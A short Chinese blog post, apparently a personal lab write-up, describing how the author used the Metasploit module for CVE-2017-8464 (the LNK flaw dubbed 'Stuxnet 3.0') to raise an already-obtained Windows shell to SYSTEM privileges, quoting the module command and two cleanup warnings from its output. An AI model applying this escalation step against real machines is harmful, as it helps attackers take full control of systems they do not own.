msf之使用震网三代来提权

cve_2017_8464_lnk_lpe,他就是震网三代的exploit
上次没有成功将x64的搞定,现在搬来了震网三代
看我来个远程执行漏洞的提权
前面已经拿到shell,但没有system权限
在这里插入图片描述
我也是稍微找了以下exploit,真是大海捞针

在这里插入图片描述
偶然发现

use exploit/windows/local/cve_2017_8464_lnk_lpe

在这里插入图片描述
设置好sessions,直接把权限提到system
在这里插入图片描述
可怕,视乎还删除了什么

[!] Tried to delete C:\Users\hack\ruwkHlybgqtAAonb.dll, unknown result
[!] Tried to delete C:\Users\hack\gqSvmAVDKpXoSASr.lnk, unknown result
发布了36 篇原创文章 · 获赞 9 · 访问量 8191

猜你喜欢

转载自blog.csdn.net/qq_44902875/article/details/104719282